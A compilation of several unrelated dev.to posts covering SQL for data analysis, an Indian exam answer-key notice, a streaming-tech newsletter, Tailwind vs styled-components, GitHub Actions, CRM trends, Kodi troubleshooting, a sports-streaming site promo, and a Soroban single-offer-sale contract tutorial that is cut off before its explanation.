• Text Mining Model: Text mining is a process of extracting useful information from unstructured text data. SQL can be used to build text mining models, which can help to analyze text data and extract insights, such as sentiment analysis or topic modeling.
**Importance of SQL in Data Analysis**
SQL plays a very vital role in data analysis by providing a robust and standardized set of tools for retrieving, transforming, and summarizing data in relational databases. These roles are;
1. Data retrieval: SQL is used to retrieve data from databases. Analysts can use SQL to write queries that extract specific data from a database, which can then be analyzed and visualized using other tools.
2. Data transformation: SQL can be used to transform data, such as filtering, grouping, and aggregating data, to prepare it for analysis. SQL's capabilities for data transformation are essential for data cleaning and preparation, which is a crucial step in the data analysis process.
3. Data aggregation and summarization: SQL provides several functions for aggregating and summarizing data, such as COUNT, SUM, AVG, MAX, and MIN. These functions are essential for summarizing and understanding the characteristics of large datasets.
4. Joining multiple tables: SQL provides powerful join capabilities that enable analysts to combine data from multiple tables. Joining tables is a critical step in data analysis, especially for large datasets.
5. Data visualization: SQL can be used to retrieve and summarize data, which can then be visualized using other tools. Data analysts can use SQL to create the underlying data for charts, graphs, and other visualizations.
6. Data modeling: SQL can be used to create and manage data models, which define the structure and relationships of data in a database. Data modeling is an essential step in designing databases that are optimized for data analysis.
From these roles, a list of use cases can be derived. Some real-world examples of how SQL in data analysis can be used are;
1. E-commerce analysis: E-commerce businesses use SQL to analyze customer behavior, such as purchase history, shopping cart behavior, and website navigation. This information is used to optimize the user experience, recommend products, and personalize marketing messages. For example, an e-commerce company may use SQL to analyze shopping cart data and identify the most commonly abandoned items, allowing them to adjust pricing or shipping costs to reduce cart abandonment rates.
2. Financial analysis: Financial institutions use SQL to analyze customer transactions, such as deposit and withdrawal history, credit card usage, and loan payment behavior. This information is used to identify potential fraud, assess credit risk, and optimize lending decisions. For example, a bank may use SQL to analyze customer transaction history and identify patterns of suspicious behavior, such as unusual transactions or high-risk purchases.
3. Healthcare analysis: Healthcare organizations use SQL to analyze patient data, such as medical history, treatment outcomes, and healthcare utilization. This information is used to improve patient care, optimize healthcare delivery, and manage costs. For example, a hospital may use SQL to analyze patient outcomes for a particular treatment, allowing them to adjust treatment protocols to improve patient outcomes and reduce costs.
4. Marketing analysis: Marketing teams use SQL to analyze customer demographics, behavior, and preferences. This information is used to optimize marketing campaigns, personalize messaging, and improve customer retention. For example, a marketing team may use SQL to analyze customer purchase history and identify patterns in product preferences, allowing them to create targeted campaigns and promotions for specific customer segments.
5. Supply chain analysis: Supply chain companies use SQL to analyze inventory levels, logistics data, and shipping history. This information is used to optimize operations, reduce costs, and improve delivery times. For example, a logistics company may use SQL to analyze shipping data and identify patterns in delivery times, allowing them to adjust routes and schedules to improve efficiency and reduce costs.
**Merits and Demerits of using SQL for data analysis**
While SQL is a very powerful tool for data analysis, it has its strengths and weaknesses. How effective SQL depends on how well it aligns with the needs of a company.
**Merits:**
1. Speed: SQL is a fast and efficient language for retrieving, transforming, and summarizing data, and it can quickly process large datasets.
2. Standardization: SQL is a standard language used across many different relational database management systems, which makes it easy to learn and widely applicable.
3. Data Integration: SQL provides powerful join capabilities that allow analysts to combine data from multiple tables or even multiple databases. This makes it easier to integrate and analyze data from multiple sources.
4. Data Transformation: SQL provides a range of functions for data transformation, which can be used to clean and prepare data for analysis. These functions make it easier to standardize data and prepare it for analysis.
5. Security: SQL provides robust security features, including user authentication and access control, which help to protect sensitive data from unauthorized access.
**Demerits:**
1. Limited to Relational Databases: SQL is designed to work with relational databases and cannot be used to analyze data stored in other types of databases or data sources.
2. Limited Functionality: Although SQL provides a wide range of functions for data manipulation, it may not have all the functionality required for complex data analysis.
3. Complexity: SQL can be a complex language to learn, especially for those who are new to programming or have limited experience working with databases.
4. Maintenance: Maintaining a database and ensuring that it is up to date can be time-consuming and resource-intensive.
5. Requires Technical Expertise: To use SQL effectively, analysts require technical expertise in database design, data modeling, and SQL query writing.
**Conclusion**
SQL is a powerful tool for a data analyst, its merits outweigh its demerits.
**References**
- SQL for Data Analysis by Cathy Tanimura
- Introducing SQL: A Foundation of Data Analytics by Robb Sombach, University of Alberta, Alberta School of Business
| njenga98 |
1,371,258 | SSC GD Constable Answer Key 2023: Check Your Answers Now! | SSC GD Constable Answer Key 2023 Date: Staff Selection Commission (SSC) has released the answer key... | 0 | 2023-02-19T05:41:15 | https://dev.to/lovehacker/ssc-gd-constable-answer-key-2023-check-your-answers-now-dll | ssc, result | SSC GD Constable Answer Key 2023 Date: Staff Selection Commission (SSC) has released the answer key of SSC GD Constable Exam 2023 today i.e. on 18 February 2023 on its official website. Candidates who have appeared for the exam can download the answer key now and check their answers. The downloading process is given below, by following which candidates can download their answer key. SSC GD Constable exam was conducted between January 10 to February 14, 2023, in which a total of 30,41,284 candidates appeared.
Let us tell you that this GD Constable Exam was conducted for a total of 45284 posts, out of which 4835 posts are for female constables and 40274 posts are for male constables. This exam of SSC GD Constable is conducted for the recruitment of Central Armed Police Forces (CAPF), NIA, SSF and Rifleman (GD) in Assam Rifles. In which a total of 52,20,335 candidates applied for the exam and 30,41,284 candidates appeared in the exam.
Candidates can download SSC GD Constable Answer Key from the official website of SSC, ssc.nic.in. The answer key contains the correct answers to all the questions asked in the exam. Candidates can use the answer key to calculate their probable score in the exam and get an idea of their chances of qualifying for the next round.
How to download SSC GD Constable Answer Key 2023
1. First of all go to ssc.nic.in.
2. Now click on the “Answer Key” section on the homepage.
3. Now click on “SSC GD Constable Answer Key 2023”.
4. Now submit the form by entering your login credentials like roll number, password and exam date.
5. Now the option to download PDF file of Answer Key is visible.
6. After downloading the Answer Key PDF, take a printout for future reference.
After checking the [SSC GD Constable Answer Key 2023](https://hindi.wordlex.org/sarakari-result/ssc-gd-constable-answer-key-2023-date/), if candidates find any discrepancy in the answer key, they can apply for objection before 25 February. The fee for one objection has been kept at Rs 100. Candidates can submit objections with their valid proof.
Read such latest breaking news in Hindi only on [WordleX News Hindi](https://hindi.wordlex.org/). Read today's latest news 2023, about exams, live news updates on the world's most trusted website WordleX News Hindi. | lovehacker |
1,372,816 | FLiP-FLaNK Stack Weekly 20-February-2023 | 20-February-2023 FLiPN-FLaNK Stack Weekly Welcome to the seventh newsletter... | 0 | 2023-02-20T16:18:24 | https://dev.to/tspannhw/flip-flank-stack-weekly-20-february-2023-f86 | apachepulsar, apacheflink, apacenifi, apachekafka | ## 20-February-2023
### FLiPN-FLaNK Stack Weekly

Welcome to the seventh newsletter of 2023. Getting closer...
Tim Spann @PaaSDev
Happy President's Day.

The new stuff in NiFi 1.20 is incredible, what is coming is unreal. I got some secret early looks at upcoming stuff and I can't wait to show at some talks in March.
[https://www.timswarmercabel.com/](https://www.timswarmercabel.com/)
Upcoming talk at Spring / VMWare / Tanzu

[https://tanzu.vmware.com/developer/tv/golden-path/6/](https://tanzu.vmware.com/developer/tv/golden-path/6/)
[https://www.youtube.com/@VMwareTanzu](https://www.youtube.com/@VMwareTanzu)
<iframe width="560" height="315" src="https://www.youtube.com/embed/f2HsqchP2_A" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<object width="425" height="350">
<param name="movie" value="[https://youtu.be/f2HsqchP2_A](https://www.youtube.com/embed/f2HsqchP2_A)" />
<param name="wmode" value="transparent" />
<embed src="https://www.youtube.com/embed/f2HsqchP2_A"
type="application/x-shockwave-flash"
wmode="transparent" width="425" height="350" />
</object>
[https://youtu.be/f2HsqchP2_A](https://youtu.be/f2HsqchP2_A)
## PODCAST
New podcast coming.
## CODE + COMMUNITY
Join my meetup group NJ/NYC/Philly/Virtual.
[https://www.meetup.com/new-york-city-apache-pulsar-meetup/](https://www.meetup.com/new-york-city-apache-pulsar-meetup/
)
[https://www.meetup.com/futureofdata-princeton/](https://www.meetup.com/futureofdata-princeton/)
**This is Issue #71!!**
[https://github.com/tspannhw/FLiPStackWeekly](https://github.com/tspannhw/FLiPStackWeekly)
[https://www.linkedin.com/pulse/schedule-2023-tim-spann-/](https://www.linkedin.com/pulse/schedule-2023-tim-spann-/)

## Meetup
[http://www.meetup.com/futureofdata-princeton/](http://www.meetup.com/futureofdata-princeton/)
[https://www.meetup.com/phillyjug/events/291103971/](https://www.meetup.com/phillyjug/events/291103971/)
## New

## Articles
[https://blog.cloudera.com/getting-started-with-cloudera-stream-processing-community-edition/](https://blog.cloudera.com/getting-started-with-cloudera-stream-processing-community-edition/)
[https://www.kschaul.com/post/2023/02/16/how-the-post-is-replacing-mapbox-with-open-source-solutions/](https://www.kschaul.com/post/2023/02/16/how-the-post-is-replacing-mapbox-with-open-source-solutions/)
[https://policylab.rutgers.edu/report-release-garden-state-open-data-index/](https://policylab.rutgers.edu/report-release-garden-state-open-data-index/)
[https://hubertdulay.substack.com/p/stream-processing-vs-real-time-olap](https://hubertdulay.substack.com/p/stream-processing-vs-real-time-olap)
## Events
Feb 17, 2023: Spring One: Virtual and VoD
[https://tanzu.vmware.com/developer/tv/golden-path/6/](https://tanzu.vmware.com/developer/tv/golden-path/6/)
Feb 21, 2023: Summit for Java Dev: Virtual
[https://geekle.us/schedule/java23](https://geekle.us/schedule/java23)
Feb 23, 2023: Pulsar Meetup - Rising Wave + Pulsar: Virtual
[https://www.meetup.com/new-york-city-apache-pulsar-meetup/events/291048765/](https://www.meetup.com/new-york-city-apache-pulsar-meetup/events/291048765/)
March 3, 2023: Spring One: Virtual
[https://tanzu.vmware.com/developer/tv/](https://tanzu.vmware.com/developer/tv/)
March 8, 2023: Cloudera Now: Virtual
[https://www.cloudera.com/about/events/cloudera-now-cdp.html](https://www.cloudera.com/about/events/cloudera-now-cdp.html)
March 9, 2023: Hazelcast Unconference: Virtual
[https://hazelcast.com/lp/unconference/
](https://hazelcast.com/lp/unconference/)
March 15, 2023: Philly JUG Meetup: Philly
[[https://www.meetup.com/phillyjug/](https://www.meetup.com/phillyjug/events/291103971/)
March 16, 2023: Python Web Conference: Virtual
[https://2023.pythonwebconf.com/](https://2023.pythonwebconf.com/)
March 17, 2023: TCF Pro: Trenton, NJ
https://princetonacm.acm.org/tcfpro/profiles/timothy-spann.html
March 30, 2023: Pulsar Meetup - Flink: Virtual
[https://www.meetup.com/new-york-city-apache-pulsar-meetup/events/290459862/](https://www.meetup.com/new-york-city-apache-pulsar-meetup/events/290459862/)
April 4-6, 2023: DevNexus: Atlanta, GA
[https://devnexus.com/](https://devnexus.com/)
April 24-26, 2023: Real-Time Analytics Summit: San Francisco, CA
[https://rtasummit.com/](https://rtasummit.com/)
May 24-25, 2023: Infoshare: Gdansk, Poland
[https://infoshare.pl/conference](https://infoshare.pl/conference)
More Events:
[https://www.linkedin.com/pulse/schedule-2023-tim-spann-/](https://www.linkedin.com/pulse/schedule-2023-tim-spann-/)
## Tools
* [https://www.screentogif.com/](https://www.screentogif.com/)
* [https://www.adobe.com/express/feature/video/convert/mp4-to-gif](https://www.adobe.com/express/feature/video/convert/mp4-to-gif)
* [https://til.simonwillison.net/macos/sips](https://til.simonwillison.net/macos/sips)
## Devices
* [https://github.com/tspannhw/Flow-SGP30-MLX90640/blob/main/README.md](https://github.com/tspannhw/Flow-SGP30-MLX90640/blob/main/README.md)
| tspannhw |
1,385,200 | Tailwind vs styled-components in React.js | On Twitter, I constantly see people who use Tailwind and how they fell in love with it. I've been... | 0 | 2023-03-03T13:46:21 | https://dev.to/uzura89/tailwind-vs-styled-components-in-reactjs-1n0k | tailwindcss, styledcomponents, css, react | On Twitter, I constantly see people who use Tailwind and how they fell in love with it. I've been pretty much satisfied with my current work flow (styled-components), yet, I finally decided to give it a try and see if the tool was for me. This article is my own verdict after I used Tailwind for several days.
I mainly use React.js and styled-components. So this article is about a comparison between styled-components and Tailwind in the context of React.js development.
# TLDR
Long story short, I decided to stick with styled-components and not to use Tailwind. Overall, I liked the Tailwind's shortened CSS properties. It's way faster to write than original CSS. However, I didn't like the fact that you have to write all those classes inside the class attribute. It can make JSX hard to read and less flexible to do something like dynamic styling.
# Where styled-components win
## 1. Readability
What I realized first is that it's hard to read JSX when using Tailwind. With conventional CSS strategy, you give meaningful class names like class="todos-wrapper". This helps make sense of the structure just by glance. With styled-components, this is even better because you give unique name to each tags like \<TodosWrapper\>. This makes the maintenance work easier especially when you work with old codes.
```React
// with Tailwind
export const MainPage = () => {
<div className="bg-white rounded px-5 pt-1 pb-7">
// todo elements
</div>
}
```
```React
// with styled-components
export const MainPage = () => {
return <TodosWrapper>
// todo elements
</TodosWrapper>;
}
const TodosWrapper = styled.div`
background-color: white;
border-radius: 0.3rem;
padding: 8px 12px 12px 18px;
`;
```
## 2. Dynamic styling
Dynamic styling is another thing I prefer styled-components approach. Let's say you want to style an input form dynamically based on whether the input value is valid or not. In that case, you want 3 conditions such as "empty", "invalid", and "valid". With Tailwind, you have to manage this condition by directly modifying the class attribute. This means you have to write if statement within the class attribute string, which can be a little tricky to write. While you can make it cleaner by writing an outside function to handle the if statement, I personally prefer the styled-components approach because all the styling logic happens in one place and it makes clearer separation between the structure and styling.
```React
// with Tailwind
const MainPage = (props) => {
const getFormState = {
// some logic to return form state
}
const getBorderColor = (formState: string) => {
if (formState === 'empty') return "border-gray-300";
if (formState === 'invalid') return "border-red-400";
return "border-green-400";
};
return (
<div>
<input
type="email"
value={email}
onChange={handleChangeEmail}
className={`${getBorderColor(
getFormState()
)} border border-gray-300 px-3 py-2 rounded w-full`}
/>
</div>
);
};
```
```React
// with styled-components
const MainPage = () => {
const getFormState = {
// some logic to return form state
}
return (
<div>
<EmailForm
type="email"
value={email}
onChange={onChangeEmail}
placeholder="example@mail.com"
formState={getFormState()}
/>
</div>
);
};
const EmailForm = styled.input`
padding: 0.7rem 1rem
${(props) => {
switch (props.formState) {
case 'invalid':
return 'border-color: red';
case 'valid':
return 'border-color: green';
default:
return 'border-color: gray';
}
}}
`;
```
## 3. Dark mode support
Adding themes such as dark mode isn't really easy with Tailwind. Sure, Tailwind has Dark Mode feature but it's not really efficient to add "dark:border-white" attribute to every elements.
It's more easier to define a dedicated variable like "borderColor" and then change the value of that variable based on which theme you are in. This is especially better when you want to add more themes later. All you have to do is to give new value to "borderColor" and you don't need to touch JSX or CSS at all (please refer to ThemeProvider of styled-components).
https://styled-components.com/docs/advanced
```React
// With styled-components
const MainPage = () => {
return <EmailForm />;
}
export const EmailForm = styled.input`
// With ThemeProvider, you can access to theme variable from any styled components without prop drilling.
border: 1px solid ${(props) => props.theme.borderColor};
`;
```
# But what about development speed?
I agree that development time is generally faster with Tailwind. However, it's mainly because Tailwind has predefined utility classes and you don't have to write plain CSS. It is the great part of Tailwind and I actually liked the experience. However, styled-components is not far behind on this. Yes, you have to write the plain CSS but you can still reduce the development time by making your own utility styles. Just like Tailwind, you can make common styled components like Container, TextLarge, ShadowLight, etc and call it whenever you want. Of course, you will need initial development time but I'm sure it will pay off after you prepare 10~20 frequently used style sets.
# Conclusion: I choose styled-components
Maybe some of the above issues will be addressed in the future by Tailwind. However, it doesn't mean that this kind of issue won't happen again. The chances are, when you want to do some unusual things with styling or integrate with other tools, you may not have a straightforward solution. So my current conclusion is sticking with styled-components and not rushing into Tailwind (at least for now).
# How to end the argument
It's sad to see devs arguing over which tool is better. These kind of arguing does not seem to stop. But don't worry. There already is a "perfect" solution. If you combine Tailwind and styled-components, there will be no argument -> https://www.npmjs.com/package/tailwind-styled-components
*I'm not using this package but let you know it exists.
It really makes sense because Tailwind and styled-components are actually solving different problems. Why not combine them rather than choosing one another.
# Maybe I'm too new to Tailwind
Above opinion is made only after I used Tailwind for 2 days. So it's highly possible that I'm missing out on some point. If you have different view on Tailwind, please write in the comment. I would be happy to learn from experienced devs. | uzura89 |
1,409,873 | 5 Top Reasons to Use GitHub Actions for Your Next Project | A lot of people have been asking me on Twitter, Discord, Facebook, etc, whether they should be using... | 0 | 2023-03-22T01:24:25 | https://dev.to/n3wt0n/5-top-reasons-to-use-github-actions-for-your-next-project-cga | github, githubactions, cicd, devops | A lot of people have been asking me on Twitter, Discord, Facebook, etc, whether they should be using GitHub Actions and why choosing it over other services. So I’ve decided to put together 5 of the most important reasons why I think GitHub Actions is a great service.
### Video
As usual, if you are a __visual learner__, or simply prefer to watch and listen instead of reading, here you have __the video with the whole explanation__,:
{% youtube vNb-NAogQUc %}
[Link to the video: https://youtu.be/vNb-NAogQUc](https://youtu.be/vNb-NAogQUc)
If you rather prefer reading, well... let's just continue :)
### Automation
Anyway, why use GitHub Actions? Well, first reason is **Automation.**
GitHub Actions can automate your workflow, allowing you to build, test, and deploy your code right from GitHub. This can save you a lot of time and effort. For example, you can use GitHub Actions to automatically build and test your code every time you push a commit to GitHub. This ensures that your code is always up-to-date and working as expected.

But it doesn’t stop here. As you may have heard me saying already, you can also use GitHub Actions to automate other tasks, such as sending notifications, running scripts, managing pull requests and issues, and much more.
I have a whole video about automating stuff with Actions, you have the link up here and in the video description.
### Customization
Second reason to use the service is **Customization.**
GitHub Actions are highly customizable. You can create your own actions or use actions from the GitHub Marketplace to build workflows that meet your specific needs. For example, you can use a pre-built action to deploy your code to a specific cloud provider.

Or you can create your own action to run a custom test suite. You can also use environment variables and secrets to customize your workflows even further. If you can think about it, you can do it. There is no limit with GitHub Actions!
Oh btw, let me know in the comments if you want me to cover the creation of custom actions in a future article/video.
### Integration
Another reason to use GitHub Actions, the third one, is **Integration.**
GitHub Actions integrates seamlessly with other GitHub features, such as pull requests and issues. This makes it easy to manage your entire workflow in one place. For example, you can use GitHub Actions to automatically build and test your code whenever a pull request is opened.
This ensures that your code is always tested before it’s merged into your main branch. You can also use GitHub Actions to automatically close issues or assign them to specific team members.

Furthermore, Actions integrate with the major cloud providers, including Azure, AWS and GCP, and most of the common DevOps and work management tools like Jira, Service Now, Slack, etc, and you can use it even if your code is not in GitHub (like if you are using, for example, GitLab, Azure DevOps, Jenkins, etc)
### Community
Fourth reason to use GitHub Action? The **Community.**
GitHub Actions has a large and active community. And this is a double advantage.
You can find many pre-built actions in the GitHub Marketplace, and you can also share your own actions with the community. This makes it easy to find and use actions that meet your specific needs. You can also contribute to the community by creating your own actions or improving existing ones.

As I’ve mentioned there is a second advantage to the large community behind GitHub Actions: the support. You can literally find thousands and thousands of people who have either experienced already your pain points and challenges, and so you have the solutions arleady ready, or you can ask in forums like Stack Overflow or GitHub’s own portal “GitHub Community” and have the answers to your questions in literally minutes.
### Cost
And if you need one more reason to use GitHub Actions, the fifth and last one of this video, that would be **Cost.** Or, better, lack thereof**.**

GitHub Actions, in fact, is free for public repositories, and you get 2,000 free minutes of build time per month for private repositories. This makes it an affordable option for developers of all sizes. If you need more build time, you can purchase additional minutes at a reasonable price. You can also use self-hosted runners to run your workflows on your own infrastructure.
### Conclusions
Let me know in the comments if you have other important reasons why you think someone should use GitHub Actions and, if you want to know more about the service, check out [my complete 1 and a half our GitHub Actions course](https://youtu.be/TLB5MY9BBa4).
__Like, share and follow me__ 🚀 for more content:
📽 [YouTube](https://www.youtube.com/CoderDave)
☕ [Buy me a coffee](https://buymeacoffee.com/CoderDave)
💖 [Patreon](https://patreon.com/CoderDave)
📧 [Newsletter](https://coderdave.io/newsletter)
🌐 [CoderDave.io Website](https://coderdave.io)
👕 [Merch](https://geni.us/cdmerch)
👦🏻 [Facebook page](https://www.facebook.com/CoderDaveYT)
🐱💻 [GitHub](https://github.com/n3wt0n)
👲🏻 [Twitter](https://www.twitter.com/davide.benvegnu)
👴🏻 [LinkedIn](https://www.linkedin.com/in/davidebenvegnu/)
🔉 [Podcast](https://geni.us/cdpodcast)
<a href="https://www.buymeacoffee.com/CoderDave" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png" alt="Buy Me A Coffee" style="height: 30px !important; width: 108px !important;" ></a>
{% youtube vNb-NAogQUc %} | n3wt0n |
1,410,085 | CRM trends to keep an eye on | Why should you learn CRM trends? There are many reasons why learning about CRM trends is important... | 0 | 2023-03-22T07:41:20 | https://dev.to/databeys/crm-trends-to-keep-an-eye-on-27gd | crm, ai, api, devops | Why should you learn CRM trends?
There are many reasons why learning about CRM trends is important for businesses and professionals:
• Stay ahead of the competition: By keeping up with CRM trends, companies can stay ahead of the competition. They can identify new opportunities, gain a competitive advantage, and develop strategies to improve customer engagement and loyalty.
• Improving Customer Experience: CRM trends focus on improving customer experience by providing customized, relevant, and consistent interactions across multiple touch points. By learning about these trends, companies can gain insight into how they can improve the customer experience, which can lead to increased customer satisfaction and loyalty.
• Improve Efficiency and Productivity: CRM trends often involve new technology and automation, which can help companies streamline their operations and improve efficiency. By recognizing these trends, companies can identify areas where they can automate routine tasks, freeing up time for employees to focus on more strategic tasks.
• Make better decisions: CRM trends often involve collecting and analyzing customer data, which can provide companies with insights into customer behavior, preferences, and needs. By recognizing these trends, companies can make informed decisions, identify new opportunities, and improve overall business performance.
• Career Advancement: For professionals, becoming familiar with CRM trends can help them stay abreast of industry developments and position themselves for career advancement. By keeping up with CRM trends, professionals can gain new skills and knowledge that can help them meet new challenges and advance their careers.
In short, becoming familiar with [CRM trends](https://www.databeys.com/) is essential for businesses and professionals who want to stay competitive, enhance customer experience, improve efficiency and productivity, make informed decisions, and advance their careers.
Read More: [CRM Trends To Keep An Eye On](https://www.databeys.com/blog/crm-trends-to-keep-an-eye-on/) | databeys |
1,410,922 | How to Fix Kodi Black Screen | If you are facing a black screen issue on Kodi, there are several ways to fix it. Here are some of... | 0 | 2023-03-22T09:06:39 | https://dev.to/neelum23/how-to-fix-kodi-black-screen-5e77 | kodi, beginners | <p>If you are facing a black screen issue on Kodi, there are several ways to fix it. Here are some of the solutions I studied at <a href="http://www.bestkoditips.com">Bestkoditips</a> that you can try:</p>
<p><br></p>
<p>Clear Cache and Data: Sometimes, Kodi's cache and data can get corrupted, causing the black screen issue. To fix this, go to Settings > Apps > Kodi > Storage > Clear Cache and Clear Data. This will clear all the cache and data stored by Kodi, and you can launch the app again to see if the issue is resolved.</p>
<p><br></p>
<p>Check Your Power Source: Kodi requires a stable power source to function correctly. If your device's power source is weak, it can cause a black screen issue. Check if the power source is stable and try connecting to another power outlet.</p>
<p><br></p>
<p>Update Kodi: Outdated versions of Kodi can cause several issues, including the black screen. Ensure that you have the latest version of Kodi installed on your device. If not, update it to the latest version.</p>
<p><br></p>
<p>Disable Hardware Acceleration: Hardware acceleration can also cause issues with Kodi. To fix this, disable hardware acceleration by going to Settings > Player Settings > Videos > Disable hardware acceleration.</p>
<p><br></p>
<p>Remove Add-ons: Sometimes, certain add-ons can cause conflicts with Kodi, leading to a black screen issue. Try removing the add-ons that you recently installed and see if the issue is resolved.</p>
<p><br></p>
<p>Reinstall Kodi: If none of the above solutions work, try uninstalling Kodi from your device and reinstalling it again. This will reset Kodi to its default settings, and you can start using the app again.</p>
<p><br></p>
<p>By trying these solutions, you can fix the black screen issue on Kodi and enjoy uninterrupted streaming.</p> | neelum23 |
1,410,937 | Answer: Replacing text within a label | answer re: Replacing text within a label ... | 0 | 2023-03-22T09:30:57 | https://dev.to/ratiarahman/answer-replacing-text-within-a-label-52ik | {% stackoverflow 63030010 %} | ratiarahman | |
1,411,076 | Exploring the Benefits of Watching Live Sports on FirstRowSports | Do you love sports but can't always make it to the game? Or maybe you're looking for a more... | 0 | 2023-03-22T11:50:49 | https://dev.to/ggggaga2/exploring-the-benefits-of-watching-live-sports-on-firstrowsports-3n5b | firtsrow, firstrowsport, javascript | Do you love sports but can't always make it to the game? Or maybe you're looking for a more affordable way to catch all the live action? Look no further than FirstRowSports. This website has been a go-to for sports enthusiasts for years, and for good reason. From football to basketball, hockey to baseball, and everything in between, FirstRowSports has it all. But what are the benefits of watching live sports on this site? In this post, we'll explore the top reasons why using FirstRowSports to watch live sports can be a game-changer for sports fans everywhere. So grab your jersey and settle in, because it's time to dive into the exciting world of live sports on FirstRowSports.
The Appeal of Watching Live Sports on FirstRowSports
FirstRowSports has become a go-to streaming platform for sports enthusiasts all over the globe. Its immense popularity is largely due to its ability to connect viewers with a vast range of sporting events from around the world. Whether it's football, basketball, tennis, cricket, or any other sport, FirstRowSports offers live streams of almost all major competitions, leagues, and tournaments. With easy-to-use navigation and a user-friendly interface, users can access a variety of matches with just a few clicks. Moreover, FirstRowSports provides high-quality streams, ensuring that users can enjoy the action in the best possible way. In essence, it's no wonder that this platform has grown in popularity over the years and continues to be a favorite for sports enthusiasts looking for live sports broadcasts.
Thus, it is evident that [FirstRowSports](https://allin1.cx/firstrowsports) has established itself as a reliable and convenient platform for sports enthusiasts to stream live events at their convenience. Its user-friendly interface and live streaming capabilities make it a go-to place for sports fans to keep up with their favorite games and tournaments. Moreover, the fact that it allows users to stream these events in real-time without any buffering or lag is a major advantage over other similar platforms. Whether you are at home or on-the-go, FirstRowSports has got you covered with its wide range of streaming options. In conclusion, FirstRowSports is undoubtedly an exceptional platform for all sports lovers who want to stay updated with the latest matches and enjoy them in high-quality streaming without any interruptions. | ggggaga2 |
1,411,334 | Soroban Contracts 101: Single Offer Sale | Hi there! Welcome to my fourteenth post of my series called "Soroban Contracts 101", where I'll be... | 22,205 | 2023-03-22T16:21:49 | https://dev.to/yuzurush/soroban-contracts-101-single-offer-sale-18jc | soroban, sorobanathon, stellar, smartcontract | Hi there! Welcome to my fourteenth post of my series called "Soroban Contracts 101", where I'll be explaining the basics of Soroban contracts, such as data storage, authentication, custom types, and more. All the code that we're gonna explain throughout this series will mostly come from [soroban-contracts-101](https://github.com/yuzurush/soroban-contracts-101) github repository.
In this post, i will explain about Soroban Single Offer Sale example contract. This contract provided a feature to the seller, enabling them to establish an offer for selling token A to numerous buyers in exchange for token B.
##The Contract Code
```rust
#![no_std]
use soroban_sdk::{contractimpl, contracttype, unwrap::UnwrapOptimized, Address, BytesN, Env};
mod token {
soroban_sdk::contractimport!(file = "../soroban_token_spec.wasm");
}
#[derive(Clone)]
#[contracttype]
pub enum DataKey {
Offer,
}
// Represents an offer managed by the SingleOffer contract.
// If a seller wants to sell 1000 XLM for 100 USDC the `sell_price` would be 1000
// and `buy_price` would be 100 (or 100 and 10, or any other pair of integers
// in 10:1 ratio).
#[derive(Clone)]
#[contracttype]
pub struct Offer {
// Owner of this offer. Sells sell_token to get buy_token.
pub seller: Address,
pub sell_token: BytesN<32>,
pub buy_token: BytesN<32>,
// Seller-defined price of the sell token in arbitrary units.
pub sell_price: u32,
// Seller-defined price of the buy token in arbitrary units.
pub buy_price: u32,
}
pub struct SingleOffer;
/*
How this contract should be used:
1. Call `create` once to create the offer and register its seller.
2. Seller may transfer arbitrary amounts of the `sell_token` for sale to the
contract address for trading. They may also update the offer price.
3. Buyers may call `trade` to trade with the offer. The contract will
immediately perform the trade and send the respective amounts of `buy_token`
and `sell_token` to the seller and buyer respectively.
4. Seller may call `withdraw` to claim any remaining `sell_token` balance.
*/
#[contractimpl]
impl SingleOffer {
// Creates the offer for seller for the given token pair and initial price.
// See comment above the `Offer` struct for information on pricing.
pub fn create(
e: Env,
seller: Address,
sell_token: BytesN<32>,
buy_token: BytesN<32>,
sell_price: u32,
buy_price: u32,
) {
if e.storage().has(&DataKey::Offer) {
panic!("offer is already created");
}
if buy_price == 0 || sell_price == 0 {
panic!("zero price is not allowed");
}
// Authorize the `create` call by seller to verify their identity.
seller.require_auth();
write_offer(
&e,
&Offer {
seller,
sell_token,
buy_token,
sell_price,
buy_price,
},
);
}
// Trades `buy_token_amount` of buy_token from buyer for `sell_token` amount
// defined by the price.
// `min_sell_amount` defines a lower bound on the price that the buyer would
// accept.
// Buyer needs to authorize the `trade` call and internal `transfer` call to
// the contract address.
pub fn trade(e: Env, buyer: Address, buy_token_amount: i128, min_sell_token_amount: i128) {
// Buyer needs to authorize the trade.
buyer.require_auth();
// Load the offer and prepare the token clients to do the trade.
let offer = load_offer(&e);
let sell_token_client = token::Client::new(&e, &offer.sell_token);
let buy_token_client = token::Client::new(&e, &offer.buy_token);
// Compute the amount of token that buyer needs to receive.
let sell_token_amount = buy_token_amount
.checked_mul(offer.sell_price as i128)
.unwrap_optimized()
/ offer.buy_price as i128;
if sell_token_amount < min_sell_token_amount {
panic!("price is too low");
}
let contract = e.current_contract_address();
// Perform the trade in 3 `transfer` steps.
// Note, that we don't need to verify any balances - the contract would
// just trap and roll back in case if any of the transfers fails for
// any reason, including insufficient balance.
// Transfer the `buy_token` from buyer to this contract.
// This `transfer` call should be authorized by buyer.
// This could as well be a direct transfer to the seller, but sending to
// the contract address allows building more transparent signature
// payload where the buyer doesn't need to worry about sending token to
// some 'unknown' third party.
buy_token_client.transfer(&buyer, &contract, &buy_token_amount);
// Transfer the `sell_token` from contract to buyer.
sell_token_client.transfer(&contract, &buyer, &sell_token_amount);
// Transfer the `buy_token` to the seller immediately.
buy_token_client.transfer(&contract, &offer.seller, &buy_token_amount);
}
// Sends amount of token from this contract to the seller.
// This is intentionally flexible so that the seller can withdraw any
// outstanding balance of the contract (in case if they mistakenly
// transferred wrong token to it).
// Must be authorized by seller.
pub fn withdraw(e: Env, token: BytesN<32>, amount: i128) {
let offer = load_offer(&e);
offer.seller.require_auth();
token::Client::new(&e, &token).transfer(
&e.current_contract_address(),
&offer.seller,
&amount,
);
}
// Updates the price.
// Must be authorized by seller.
pub fn updt_price(e: Env, sell_price: u32, buy_price: u32) {
if buy_price == 0 || sell_price == 0 {
panic!("zero price is not allowed");
}
let mut offer = load_offer(&e);
offer.seller.require_auth();
offer.sell_price = sell_price;
offer.buy_price = buy_price;
write_offer(&e, &offer);
}
// Returns the current state of the offer.
pub fn get_offer(e: Env) -> Offer {
load_offer(&e)
}
}
fn load_offer(e: &Env) -> Offer {
e.storage().get_unchecked(&DataKey::Offer).unwrap()
}
fn write_offer(e: &Env, offer: &Offer) {
e.storage().set(&DataKey::Offer, offer);
}
mod test;
```
Here's a brief explanation of the `SingleOffer` contract code:
